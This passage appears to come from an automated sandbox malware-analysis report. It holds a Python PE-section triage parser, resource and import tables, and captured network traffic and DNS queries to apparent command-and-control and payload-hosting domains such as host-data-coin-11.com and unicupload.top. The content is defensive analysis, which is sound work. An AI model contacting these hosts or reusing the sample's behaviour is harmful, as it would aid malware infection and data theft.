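    image = dos + b"PE\0\0" + coff + b"\0" * opt_hdr_size + hdrs
    return image.ljust(align(headers_len), b"\0") + body


# Constructed sample shaped like the report's table: high-entropy .text, a
# normal .data, and a near-empty section with a random-looking name.
SAMPLE_PE = build_test_pe([
    (".text", bytes(range(256)) * 4, 0x400, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (".data", b"\0" * 0x100 + b"A" * 0x10, 0x110, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    (".bekuvox", b"\0" * 5, 0x5, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
])

if __name__ == "__main__":
    for s in parse_sections(SAMPLE_PE):
        print(f'{s["name"]:<9} VA={s["virtual_address"]:#07x} vsize={s["virtual_size"]:#x} '
              f'raw={s["raw_size"]:#x} entropy={s["entropy"]:.2f} {triage_section(s)}')
```

To run it against a real file, replace SAMPLE_PE with `open(path, "rb").read()`; the parser reads only the section headers and the raw bytes they point at, so a truncated or hostile header yields an empty section rather than an exception. Entropy here is computed over the raw on-disk bytes, which is what the report's Entropy column measures as well.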

Resources

Name | RVA | Size | Type | Language | Country
CIDAFICUDUROSOTAROM | 0x62588 | 0x6c7 | ASCII text, with very long lines, with no line terminators | Spanish | Colombia
RT_CURSOR | 0x62d60 | 0x130 | data | Divehi; Dhivehi; Maldivian | Maldives
RT_CURSOR | 0x62ea8 | 0x130 | data | Divehi; Dhivehi; Maldivian | Maldives
RT_CURSOR | 0x62fd8 | 0xf0 | data | Divehi; Dhivehi; Maldivian | Maldives
RT_CURSOR | 0x630c8 | 0x10a8 | dBase III DBT, version number 0, next free block index 40 | Divehi; Dhivehi; Maldivian | Maldives
RT_ICON | 0x5c6a0 | 0x6c8 | data | Spanish | Colombia
RT_ICON | 0x5cd68 | 0x568 | GLS_BINARY_LSB_FIRST | Spanish | Colombia
RT_ICON | 0x5d2d0 | 0x10a8 | data | Spanish | Colombia
RT_ICON | 0x5e378 | 0x988 | dBase III DBT, version number 0, next free block index 40 | Spanish | Colombia
RT_ICON | 0x5ed00 | 0x468 | GLS_BINARY_LSB_FIRST | Spanish | Colombia
RT_ICON | 0x5f1b8 | 0x8a8 | data | Spanish | Colombia
RT_ICON | 0x5fa60 | 0x6c8 | data | Spanish | Colombia
RT_ICON | 0x60128 | 0x568 | GLS_BINARY_LSB_FIRST | Spanish | Colombia
RT_ICON | 0x60690 | 0x10a8 | data | Spanish | Colombia
RT_ICON | 0x61738 | 0x988 | data | Spanish | Colombia
RT_ICON | 0x620c0 | 0x468 | GLS_BINARY_LSB_FIRST | Spanish | Colombia
RT_STRING | 0x641a0 | 0x6e | data | Divehi; Dhivehi; Maldivian | Maldives
RT_STRING | 0x64210 | 0x256 | data | Divehi; Dhivehi; Maldivian | Maldives
RT_STRING | 0x64468 | 0x788 | data | Divehi; Dhivehi; Maldivian | Maldives
RT_STRING | 0x64bf0 | 0x16e | data | Divehi; Dhivehi; Maldivian | Maldives
RT_ACCELERATOR | 0x62ca8 | 0x78 | data | Divehi; Dhivehi; Maldivian | Maldives
RT_ACCELERATOR | 0x62c50 | 0x58 | data | Divehi; Dhivehi; Maldivian | Maldives
RT_GROUP_CURSOR | 0x62e90 | 0x14 | data | Divehi; Dhivehi; Maldivian | Maldives
RT_GROUP_CURSOR | 0x64170 | 0x30 | data | Divehi; Dhivehi; Maldivian | Maldives
RT_GROUP_ICON | 0x5f168 | 0x4c | data | Spanish | Colombia
RT_GROUP_ICON | 0x62528 | 0x5a | data | Spanish | Colombia
None | 0x62d30 | 0xa | data | Divehi; Dhivehi; Maldivian | Maldives
None | 0x62d40 | 0xa | data | Divehi; Dhivehi; Maldivian | Maldives
None | 0x62d20 | 0xa | data | Divehi; Dhivehi; Maldivian | Maldives
None | 0x62d50 | 0xa | data | Divehi; Dhivehi; Maldivian | Maldives

Imports

DLL | Import
KERNEL32.dll | CallNamedPipeA, TerminateProcess, GetExitCodeProcess, GetVersionExA, GetConsoleCP, GetConsoleAliasesLengthA, CommConfigDialogA, FindFirstFileExW, GetDriveTypeA, FreeEnvironmentStringsA, GetProcessPriorityBoost, SetVolumeMountPointA, GetLongPathNameA, CopyFileW, TlsSetValue, SetConsoleCursorInfo, LocalHandle, TzSpecificLocalTimeToSystemTime, FindAtomA, ReleaseSemaphore, GetNamedPipeHandleStateA, SetThreadPriorityBoost, BuildCommDCBAndTimeoutsW, GetProcAddress, GetModuleHandleA, LocalAlloc, LocalReAlloc, GetCommandLineA, InterlockedExchange, GetCalendarInfoA, DeleteFileA, CreateActCtxA, CreateRemoteThread, CreateThread, GetPriorityClass, WritePrivateProfileStringW, GetProcessHeaps, GetProcessHeap, GlobalUnWire, ReadConsoleOutputCharacterW, GetStartupInfoA, GetDiskFreeSpaceExA, GetCPInfoExA, GetWindowsDirectoryA, GetSystemWow64DirectoryW, GetLastError, GetProfileStringA, WriteProfileSectionW, GetProfileStringW, SetLastError, GetStringTypeExA, DebugBreak, GetPrivateProfileSectionW, lstrcmpW, ReadFile, GetConsoleMode, TerminateThread, GetThreadSelectorEntry, lstrcatW, CreateActCtxW, SetMailslotInfo, SetSystemTimeAdjustment, DefineDosDeviceW, EndUpdateResourceW, WriteConsoleA, GetPrivateProfileStructW, TryEnterCriticalSection, HeapLock, DisableThreadLibraryCalls, PeekConsoleInputW, GetTapeStatus, TransmitCommChar, WaitNamedPipeW, FindResourceExA, GetLocalTime, GetOverlappedResult, CreateSemaphoreW, SetThreadLocale, SetFileShortNameA, lstrcpyA, VerLanguageNameW, UnlockFile, GetConsoleAliasA, GetConsoleAliasExesLengthW, EnumDateFormatsW, RequestDeviceWakeup, ResetWriteWatch, GetNumberOfConsoleInputEvents, TlsGetValue, GetComputerNameW, HeapFree, SetCommMask, SetEndOfFile, FindClose, PostQueuedCompletionStatus, AreFileApisANSI, SetWaitableTimer, EnumResourceNamesW,
  GetProcessTimes, GetConsoleAliasesLengthW, FatalAppExitA, lstrcpynW, GetNamedPipeInfo, FillConsoleOutputCharacterA, GetCompressedFileSizeA, FindNextVolumeMountPointW, GetFullPathNameW, WriteProfileStringW, SetHandleCount, GlobalAddAtomA, TerminateJobObject, QueryDosDeviceW, InitializeCriticalSection, Process32FirstW, SetCurrentDirectoryW, GetBinaryTypeW, OpenMutexA, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, MultiByteToWideChar, InterlockedCompareExchange, Sleep, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, RaiseException, RtlUnwind, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetModuleFileNameW, MoveFileA, GetStartupInfoW, LCMapStringA, LCMapStringW, GetCPInfo, HeapValidate, IsBadReadPtr, GetStringTypeW, GetModuleHandleW, TlsAlloc, GetCurrentThreadId, TlsFree, GetStdHandle, WriteFile, OutputDebugStringA, WriteConsoleW, GetFileType, OutputDebugStringW, ExitProcess, LoadLibraryW, GetModuleFileNameA, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, HeapDestroy, HeapCreate, VirtualFree, GetACP, GetOEMCP, IsValidCodePage, GetLocaleInfoA, GetStringTypeA, HeapAlloc, HeapSize, HeapReAlloc, VirtualAlloc, IsValidLocale, EnumSystemLocalesA, GetUserDefaultLCID, FlushFileBuffers, SetFilePointer, InitializeCriticalSectionAndSpinCount, LoadLibraryA, GetLocaleInfoW, SetStdHandle, GetConsoleOutputCP, CloseHandle, CreateFileA

Possible Origin

Language of compilation system | Country where language is spoken
Spanish | Colombia
Divehi; Dhivehi; Maldivian | Maldives

Network Behavior

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 4, 2022 19:32:46.355736017 CET | 49751 | 80 | 192.168.2.5 | 89.223.65.17
Jan 4, 2022 19:32:46.405219078 CET | 80 | 49751 | 89.223.65.17 | 192.168.2.5
Jan 4, 2022 19:32:46.405328989 CET | 49751 | 80 | 192.168.2.5 | 89.223.65.17
Jan 4, 2022 19:32:46.405797005 CET | 49751 | 80 | 192.168.2.5 | 89.223.65.17
Jan 4, 2022 19:32:46.405874968 CET | 49751 | 80 | 192.168.2.5 | 89.223.65.17
Jan 4, 2022 19:32:46.455002069 CET | 80 | 49751 | 89.223.65.17 | 192.168.2.5
Jan 4, 2022 19:32:46.496562004 CET | 80 | 49751 | 89.223.65.17 | 192.168.2.5
Jan 4, 2022 19:32:46.496746063 CET | 49751 | 80 | 192.168.2.5 | 89.223.65.17
Jan 4, 2022 19:32:46.498907089 CET | 49751 | 80 | 192.168.2.5 | 89.223.65.17
Jan 4, 2022 19:32:46.541908979 CET | 49752 | 80 | 192.168.2.5 | 89.223.65.17
Jan 4, 2022 19:32:46.548660040 CET | 80 | 49751 | 89.223.65.17 | 192.168.2.5
Jan 4, 2022 19:32:46.617382050 CET | 80 | 49752 | 89.223.65.17 | 192.168.2.5
Jan 4, 2022 19:32:46.617525101 CET | 49752 | 80 | 192.168.2.5 | 89.223.65.17
Jan 4, 2022 19:32:46.617714882 CET | 49752 | 80 | 192.168.2.5 | 89.223.65.17
Jan 4, 2022 19:32:46.617731094 CET | 49752 | 80 | 192.168.2.5 | 89.223.65.17
Jan 4, 2022 19:32:46.693140984 CET | 80 | 49752 | 89.223.65.17 | 192.168.2.5
Jan 4, 2022 19:32:46.742883921 CET | 80 | 49752 | 89.223.65.17 | 192.168.2.5
Jan 4, 2022 19:32:46.743149996 CET | 49752 | 80 | 192.168.2.5 | 89.223.65.17
Jan 4, 2022 19:32:46.743724108 CET | 49752 | 80 | 192.168.2.5 | 89.223.65.17
Jan 4, 2022 19:32:46.819061041 CET | 80 | 49752 | 89.223.65.17 | 192.168.2.5
Jan 4, 2022 19:32:47.085897923 CET | 49753 | 80 | 192.168.2.5 | 89.223.65.17
Jan 4, 2022 19:32:47.154086113 CET | 80 | 49753 | 89.223.65.17 | 192.168.2.5
Jan 4, 2022 19:32:47.154202938 CET | 49753 | 80 | 192.168.2.5 | 89.223.65.17
Jan 4, 2022 19:32:47.154268026 CET | 49753 | 80 | 192.168.2.5 | 89.223.65.17
Jan 4, 2022 19:32:47.245182037 CET | 80 | 49753 | 89.223.65.17 | 192.168.2.5
Jan 4, 2022 19:32:47.245227098 CET | 80 | 49753 | 89.223.65.17 | 192.168.2.5
Jan 4, 2022 19:32:47.245280027 CET | 80 | 49753 | 89.223.65.17 | 192.168.2.5
Jan 4, 2022 19:32:47.245313883 CET | 49753 | 80 | 192.168.2.5 | 89.223.65.17
Jan 4, 2022 19:32:47.245333910 CET | 80 | 49753 | 89.223.65.17 | 192.168.2.5
Jan 4, 2022 19:32:47.245384932 CET | 80 | 49753 | 89.223.65.17 | 192.168.2.5
Jan 4, 2022 19:32:47.245397091 CET | 49753 | 80 | 192.168.2.5 | 89.223.65.17
Jan 4, 2022 19:32:47.245434999 CET | 80 | 49753 | 89.223.65.17 | 192.168.2.5
Jan 4, 2022 19:32:47.245481968 CET | 49753 | 80 | 192.168.2.5 | 89.223.65.17
Jan 4, 2022 19:32:47.245484114 CET | 80 | 49753 | 89.223.65.17 | 192.168.2.5
Jan 4, 2022 19:32:47.245532990 CET | 80 | 49753 | 89.223.65.17 | 192.168.2.5
Jan 4, 2022 19:32:47.245578051 CET | 49753 | 80 | 192.168.2.5 | 89.223.65.17
Jan 4, 2022 19:32:47.245582104 CET | 80 | 49753 | 89.223.65.17 | 192.168.2.5
Jan 4, 2022 19:32:47.245631933 CET | 80 | 49753 | 89.223.65.17 | 192.168.2.5
Jan 4, 2022 19:32:47.245680094 CET | 49753 | 80 | 192.168.2.5 | 89.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.315327883 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.315403938 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.315457106 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.315471888 CET4975380192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.315540075 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.315593958 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.315630913 CET4975380192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.315644979 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.315711021 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.315716982 CET4975380192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.315762043 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.315813065 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.315826893 CET4975380192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.315862894 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.315912962 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.315920115 CET4975380192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.315963030 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.316011906 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.316025019 CET4975380192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.316061974 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.316111088 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.316123009 CET4975380192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.316160917 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.316210032 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.316215038 CET4975380192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.316260099 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.316308975 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.316312075 CET4975380192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.316360950 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.316416979 CET4975380192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385011911 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385076046 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385128975 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385140896 CET4975380192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385181904 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385229111 CET4975380192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385232925 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385283947 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385329962 CET4975380192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385337114 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385387897 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385437965 CET4975380192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385438919 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385497093 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385549068 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385565996 CET4975380192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385606050 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385658026 CET4975380192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385658026 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385710001 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385756969 CET4975380192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385760069 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385818958 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385853052 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385916948 CET4975380192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385922909 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385970116 CET4975380192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385973930 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.386023998 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.386068106 CET4975380192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.386073112 CET804975389.223.65.17192.168.2.5

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 4, 2022 19:32:46.068125010 CET | 192.168.2.5 | 8.8.8.8 | 0xa222 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 4, 2022 19:32:46.522274017 CET | 192.168.2.5 | 8.8.8.8 | 0x1dac | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 4, 2022 19:32:46.762934923 CET | 192.168.2.5 | 8.8.8.8 | 0x3779 | Standard query (0) | privacytools-foryou-777.com | A (IP address) | IN (0x0001)
Jan 4, 2022 19:32:49.101771116 CET | 192.168.2.5 | 8.8.8.8 | 0xc7a1 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 4, 2022 19:32:49.602319002 CET | 192.168.2.5 | 8.8.8.8 | 0x6825 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 4, 2022 19:32:49.792771101 CET | 192.168.2.5 | 8.8.8.8 | 0x32ab | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 4, 2022 19:32:50.012084007 CET | 192.168.2.5 | 8.8.8.8 | 0x8894 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 4, 2022 19:32:50.247939110 CET | 192.168.2.5 | 8.8.8.8 | 0x737b | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 4, 2022 19:32:51.090269089 CET | 192.168.2.5 | 8.8.8.8 | 0xd2c8 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 4, 2022 19:32:52.477201939 CET | 192.168.2.5 | 8.8.8.8 | 0x6d65 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 4, 2022 19:32:52.706748009 CET | 192.168.2.5 | 8.8.8.8 | 0x9137 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 4, 2022 19:32:52.900149107 CET | 192.168.2.5 | 8.8.8.8 | 0x94cc | Standard query (0) | data-host-coin-8.com | A (IP address) | IN (0x0001)
Jan 4, 2022 19:32:58.898350954 CET | 192.168.2.5 | 8.8.8.8 | 0x1aac | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 4, 2022 19:32:59.098107100 CET | 192.168.2.5 | 8.8.8.8 | 0xe35f | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 4, 2022 19:32:59.327708006 CET | 192.168.2.5 | 8.8.8.8 | 0x8438 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 4, 2022 19:32:59.674631119 CET | 192.168.2.5 | 8.8.8.8 | 0xe561 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 4, 2022 19:32:59.864639997 CET | 192.168.2.5 | 8.8.8.8 | 0x704a | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:00.076483965 CET | 192.168.2.5 | 8.8.8.8 | 0x5d01 | Standard query (0) | unicupload.top | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:00.225028038 CET | 192.168.2.5 | 8.8.8.8 | 0x7970 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:00.468554020 CET | 192.168.2.5 | 8.8.8.8 | 0xe4e9 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:00.660439968 CET | 192.168.2.5 | 8.8.8.8 | 0x4743 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:00.858905077 CET | 192.168.2.5 | 8.8.8.8 | 0x519a | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:01.054914951 CET | 192.168.2.5 | 8.8.8.8 | 0xd873 | Standard query (0) | data-host-coin-8.com | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:01.209578991 CET | 192.168.2.5 | 8.8.8.8 | 0xda71 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:01.414587975 CET | 192.168.2.5 | 8.8.8.8 | 0x4d1b | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:01.599988937 CET | 192.168.2.5 | 8.8.8.8 | 0x2fd5 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:03.951637030 CET | 192.168.2.5 | 8.8.8.8 | 0x976c | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:04.237740993 CET | 192.168.2.5 | 8.8.8.8 | 0x31e8 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:04.671008110 CET | 192.168.2.5 | 8.8.8.8 | 0xc580 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:04.939270973 CET | 192.168.2.5 | 8.8.8.8 | 0x41f1 | Standard query (0) | cdn.discordapp.com | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:06.717139959 CET | 192.168.2.5 | 8.8.8.8 | 0x90ad | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:06.937068939 CET | 192.168.2.5 | 8.8.8.8 | 0x7076 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:07.161817074 CET | 192.168.2.5 | 8.8.8.8 | 0x9148 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:19.001461029 CET | 192.168.2.5 | 8.8.8.8 | 0xa28d | Standard query (0) | microsoft-com.mail.protection.outlook.com | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:21.695975065 CET | 192.168.2.5 | 8.8.8.8 | 0x5f1a | Standard query (0) | patmushta.info | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:26.991641045 CET | 192.168.2.5 | 8.8.8.8 | 0xc31b | Standard query (0) | srtuiyhuali.at | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:27.102307081 CET | 192.168.2.5 | 8.8.8.8 | 0xfdaf | Standard query (0) | fufuiloirtu.com | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:27.401127100 CET | 192.168.2.5 | 8.8.8.8 | 0xd20f | Standard query (0) | amogohuigotuli.at | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:28.449157000 CET | 192.168.2.5 | 8.8.8.8 | 0x677a | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:28.648585081 CET | 192.168.2.5 | 8.8.8.8 | 0xeac7 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:28.864703894 CET | 192.168.2.5 | 8.8.8.8 | 0xaf9d | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:29.094826937 CET | 192.168.2.5 | 8.8.8.8 | 0x391e | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:29.316817999 CET | 192.168.2.5 | 8.8.8.8 | 0x269d | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:29.844449997 CET | 192.168.2.5 | 8.8.8.8 | 0xcc97 | Standard query (0) | amogohuigotuli.at | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:31.447838068 CET | 192.168.2.5 | 8.8.8.8 | 0x12fe | Standard query (0) | amogohuigotuli.at | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:32.099167109 CET | 192.168.2.5 | 8.8.8.8 | 0xc397 | Standard query (0) | unic11m.top | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:32.174964905 CET | 192.168.2.5 | 8.8.8.8 | 0x4747 | Standard query (0) | amogohuigotuli.at | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:34.128079891 CET | 192.168.2.5 | 8.8.8.8 | 0xaf8d | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 4, 2022 19:33:34.340699911 CET | 192.168.2.5 | 8.8.8.8 | 0x10d6 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:34.422482967 CET192.168.2.58.8.8.80xffceStandard query (0)unicupload.topA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:34.560332060 CET192.168.2.58.8.8.80xc629Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:34.560527086 CET192.168.2.58.8.8.80xe0bfStandard query (0)amogohuigotuli.atA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:34.753875971 CET192.168.2.58.8.8.80x5b0cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:35.005836964 CET192.168.2.58.8.8.80x8a73Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:35.208940983 CET192.168.2.58.8.8.80x5e72Standard query (0)bit.lyA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:35.405631065 CET192.168.2.58.8.8.80x4282Standard query (0)bitly.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:35.613956928 CET192.168.2.58.8.8.80x3f02Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:35.803725958 CET192.168.2.58.8.8.80x95fdStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:36.023104906 CET192.168.2.58.8.8.80x1073Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:39.749269009 CET192.168.2.58.8.8.80x701eStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:40.010328054 CET192.168.2.58.8.8.80x2760Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:40.206621885 CET192.168.2.58.8.8.80xa59cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:40.420351028 CET192.168.2.58.8.8.80x9126Standard query (0)bit.lyA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:40.626512051 CET192.168.2.58.8.8.80x5442Standard query (0)www.mediafire.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:41.345593929 CET192.168.2.58.8.8.80x6e9fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:41.560367107 CET192.168.2.58.8.8.80x6967Standard query (0)bit.lyA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:41.754925966 CET192.168.2.58.8.8.80xecbbStandard query (0)www.mediafire.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:42.468024015 CET192.168.2.58.8.8.80x8583Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
